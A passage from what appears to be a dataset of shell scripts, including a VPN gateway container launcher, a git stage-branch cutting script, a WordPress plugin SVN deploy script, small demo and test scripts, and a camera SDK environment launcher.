-- A minimal program importing directly from an archive of compiler libraries.
-- Note that this one also uses a keyed reference to a compiler library.
#include "axllib.as"
#library Numeral "num"
import from Numeral;
-- Zero and One are exported from numeral*.as.
export Num: with {
0: %;
1: %;
}
== add {
0: % == Zero pretend %;
1: % == One pretend %;
}
END_numeral.as
echo '== Testing that the client imports from the archive'
$ALDOR -WTt+tinfer -Y $TMPDIR/lib $TMPDIR/numeral.as
echo '== Done'
| true |
08574fe7259dd95794c713a86f58cbc2cce1f233 | Shell | xmanningcentiq/blindeye | /.scripts/run.sh | UTF-8 | 646 | 3.25 | 3 | [] | no_license | #!/usr/bin/env bash
set -o pipefail
for v in 'VPN_USER' 'VPN_PASS' 'VPN_DOMAIN' 'VPN_SERVER' ; do
VARTEST="${v}"
if [ -z ${!VARTEST:-} ] ; then
echo "Missing env variable ${v}"
exit 1
fi
done
for iface in $(ip a | grep eth | grep inet | awk '{ print $2 }') ; do
iptables -t nat -A POSTROUTING -s "$iface" -j MASQUERADE
done
delayed_start() {
while [ "$(pgrep -f nxMonitor)" == "" ] ; do
sleep 1
done
dnsmasq
squid
dropbear -s -m -R
/root/keepalive.sh
}
delayed_start &
echo "------------ VPN Starts ------------"
/root/launch.expect
echo "------------ VPN exited ------------"
| true |
95dce64ff5b5b20b525e64575f66d0e8a83a34e1 | Shell | jupierce/aos-cd-jobs | /jobs/build/stagecut/scripts/stagecut.sh | UTF-8 | 1,261 | 4.03125 | 4 | [] | no_license | #!/usr/bin/env bash
set -o xtrace
set -e
if [ "$1" == "" ]; then
echo "Syntax: $0 <last_sprint_number>"
echo "Example: $0 130"
exit 1
fi
LAST_SPRINT_NUMBER="$1"
shift 1
if [ "$1" == "" ]; then
echo "At least one repository must be specified"
exit 1
fi
for repo in $@; do
echo "Processing git repository: ${repo}"
d=$(mktemp -d)
git clone "${repo}" "${d}"
pushd "${d}"
git fetch --all
if git checkout stage; then
BACKUP_BRANCH="stage-${LAST_SPRINT_NUMBER}"
if git checkout "$BACKUP_BRANCH"; then
echo "Backup branch $BACKUP_BRANCH already exists in $repo ; unable to proceed"
exit 1
fi
git checkout -b "stage-${LAST_SPRINT_NUMBER}"
git push origin "stage-${LAST_SPRINT_NUMBER}"
git checkout stage
git reset --hard master
#git push origin stage --force
echo "TEST RUN - PUSHING IS NOT CURRENTLY ENABLED."
else
echo "Stage branch did not yet exist; creating it..."
git checkout -b stage
#git push origin stage
echo "TEST RUN - PUSHING IS NOT CURRENTLY ENABLED."
fi
popd
rm -rf "${d}"
done
| true |
a5246b2ebf82c09df23473ba8de7c65378d47ba7 | Shell | iwillhappy1314/deploy2wporg | /deploy.sh | UTF-8 | 4,520 | 3.765625 | 4 | [] | no_license | #!/usr/bin/env bash
set -e
#####################################################
# 部署检查
#####################################################
# pull request 时不部署
if [ "false" != "$TRAVIS_PULL_REQUEST" ]; then
echo "Not deploying pull requests."
exit
fi
# 只部署一次
if [ ! "$WP_PULUGIN_DEPLOY" ]; then
echo "Not deploying."
exit
fi
# SVN 仓库未定义,发出提醒
if [ ! "$SVN_REPO" ]; then
echo "SVN repo is not specified."
exit
fi
#####################################################
# 拉取代码,开始构建
#####################################################
# 创建部署所使用的目录
mkdir build
cd build
BUILT_DIR=$(pwd)
# 检出 SVN
echo "从 svn 仓库检出 $SVN_REPO ..."
svn co -q "$SVN_REPO" ./svn
# 检出 Git,已经有了,是不是不需要再来一遍了,或者直接 checkout?
echo "从 git 仓库克隆 $GIT_REPO ..."
git clone -q "$GIT_REPO" ./git
# 如果设置了构建脚本,开始构建
cd "$BUILT_DIR"/git
if [ -e "bin/build.sh" ]; then
echo "开始执行 bin/build.sh."
bash bin/build.sh
fi
#####################################################
# 获取 Git 中的插件版本
#####################################################
READMEVERSION=$(grep "Stable tag" "$BUILT_DIR"/git/readme.txt | awk '{ print $NF}')
PLUGINVERSION=$(grep "Version:" "$BUILT_DIR"/git/"$MAINFILE" | awk '{ print $NF}')
# shellcheck disable=SC2046
LATEST_TAG=$(git describe --tags $(git rev-list --tags --max-count=1))
#####################################################
# 同步文件
#####################################################
# 同步 git 仓库到 SVN
cd "$BUILT_DIR"
echo "同步 Git 仓库到 SVN"
echo "$LATEST_TAG"
if [ "$TRAVIS_TAG" ]; then
# 发布标签时,同步所有文件,然后删除 .git 文件
echo "同步 git 文件到 svg trunk 中"
rsync -a --exclude=".svn" --checksum --delete ./git/ ./svn/trunk/
else
# 非标签发布时,同步 readme.txt 和 assets 文件
# 只有最新 Git Tag 和 readme.txt 中的 Tag 相同时,才更新 readme.txt,以免触发 wordpress.org 的自动版本发布
if [ "$LATEST_TAG" = "$READMEVERSION" ]; then
echo "同步 readme.text 和 assets"
cp ./git/readme.txt ./svn/trunk/ -f
cp ./git/wordpress.org/. ./svn/assets/ -fa
else
echo "git 版本和插件版本不一致,跳过更新"
fi
fi
# 同步完成后、移除 svn trunk 中的 .git 和 wordpress.org 目录
echo "移除 svn trunk 中的 .git 和 wordpress.org 目录"
rm "$BUILT_DIR"/svn/trunk/.git -Rf
rm "$BUILT_DIR"/svn/trunk/wordpress.org -Rf
#####################################################
# 设置忽略文件、删除忽略的文件
#####################################################
cd "$BUILT_DIR"/svn/trunk
# 设置 svn 忽略
if [ -e ".svnignore" ]; then
echo "根据 .svnignore 忽略文件"
svn propset -q -R svn:ignore -F .svnignore .
fi
# 删除忽略的文件
echo "删除忽略文件"
# shellcheck disable=SC2013
for file in $(cat ".svnignore" 2>/dev/null); do
rm "$file" -Rf
done
#####################################################
# 执行 SVN 操作
#####################################################
cd "$BUILT_DIR"/svn
echo "运行 svn add"
svn st | grep '^!' | sed -e 's/\![ ]*/svn del -q /g' | sh
echo "运行 svn del"
svn st | grep '^?' | sed -e 's/\?[ ]*/svn add -q /g' | sh
#####################################################
# 如果设置了用户名密码,提交到仓库,必须是 Tag 才能提交
#####################################################
cd "$BUILT_DIR"/svn
svn stat
if [ "$TRAVIS_TAG" ] && [ "$LATEST_TAG" = "$READMEVERSION" ]; then
#####################################################
# 比较版本,如果两个版本不一样,退出
#####################################################
if [ "$READMEVERSION" != "$PLUGINVERSION" ]; then
echo "插件主文件和 readme.txt 中的版本不一致,退出..."
exit 1
fi
# 发布到 wordpress.org
echo "发布到 wordpress.org"
svn ci --no-auth-cache --username "$SVN_USER" --password "$SVN_PASS" -m "Deploy version $READMEVERSION"
# 打标签
echo "打标签"
svn copy --no-auth-cache --username "$SVN_USER" --password "$SVN_PASS" "$SVN_REPO"/trunk "$SVN_REPO"/tags/"$READMEVERSION" -m "Add tag $READMEVERSION"
echo "发布新版本完成"
else
svn ci --no-auth-cache --username "$SVN_USER" --password "$SVN_PASS" -m "Update readme.txt"
echo "更新 assets 和 readme.txt 完成"
fi
| true |
4affc08fb1a3c6a7278df794f90f4886e0b6b16d | Shell | zysunGithub/BashDaily | /show123.sh | UTF-8 | 499 | 3.578125 | 4 | [] | no_license | #!/bin/bash
# Program:
# This program only access the following choice:one|two|three
# Hisotry:
# 20200116 zysun first release
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin:
export PATH
read -p "Please input your choice:" choice
case ${choice} in
"one" )
echo "Your choice is ONE."
;;
"two" )
echo "Your choice is TWO."
;;
"three")
echo "Your choice is THREE."
;;
"one two")
echo "Your choice is ONE TWO."
;;
* )
echo "Usage ${0} one|two|three."
;;
esac
| true |
bed857c333229a0764e6d80ea2020d9669c2017e | Shell | tidepool-org/tide-whisperer | /test.sh | UTF-8 | 131 | 2.5625 | 3 | [] | no_license | #!/bin/sh -eu
for D in $(find . -name '*_test.go' ! -path './vendor/*' | cut -f2 -d'/' | uniq); do
(cd ${D}; go test -v)
done
| true |
de6d6f465b76a83bd4de31d10d5fd26782fd1d83 | Shell | gurbain/HaloLinux_Software | /Utilities/drivers/pleora/bin/GEVPlayer | UTF-8 | 1,074 | 3.140625 | 3 | [] | no_license | #!/bin/bash
# Get the executable's absolute path
DIRNAME=`dirname $0`
DIRNAME=`cd $DIRNAME/..; pwd`
# set env. vars
export PUREGEV_ROOT=$DIRNAME
export GENICAM_ROOT=$DIRNAME/lib/genicam
export GENICAM_ROOT_V2_3=$GENICAM_ROOT
export GENICAM_LOG_CONFIG=$DIRNAME/lib/genicam/log/config/DefaultLogging.properties
export GENICAM_LOG_CONFIG_V2_3=$GENICAM_LOG_CONFIG
export GENICAM_CACHE_V2_3=$HOME/.config/Pleora/genicam_cache_v2_3
export GENICAM_CACHE=$GENICAM_CACHE_V2_3
mkdir -p $GENICAM_CACHE
# add to the LD_LIBRARIES_PATH
if ! echo ${LD_LIBRARY_PATH} | /bin/grep -q $PUREGEV_ROOT/lib; then
if [ "$LD_LIBRARY_PATH" = "" ]; then
LD_LIBRARY_PATH=$PUREGEV_ROOT/lib
else
LD_LIBRARY_PATH=$PUREGEV_ROOT/lib:${LD_LIBRARY_PATH}
fi
fi
if [ `uname -m` == "x86_64" ]; then
GENICAM_LIB_DIR=bin/Linux64_x64
else
GENICAM_LIB_DIR=bin/Linux32_i86
fi
if ! echo ${LD_LIBRARY_PATH} | /bin/grep -q $GENICAM_ROOT/$GENICAM_LIB_DIR; then
LD_LIBRARY_PATH=$GENICAM_ROOT/$GENICAM_LIB_DIR:${LD_LIBRARY_PATH}
fi
export LD_LIBRARY_PATH
$PUREGEV_ROOT/bin/GEVPlayer.bin
| true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.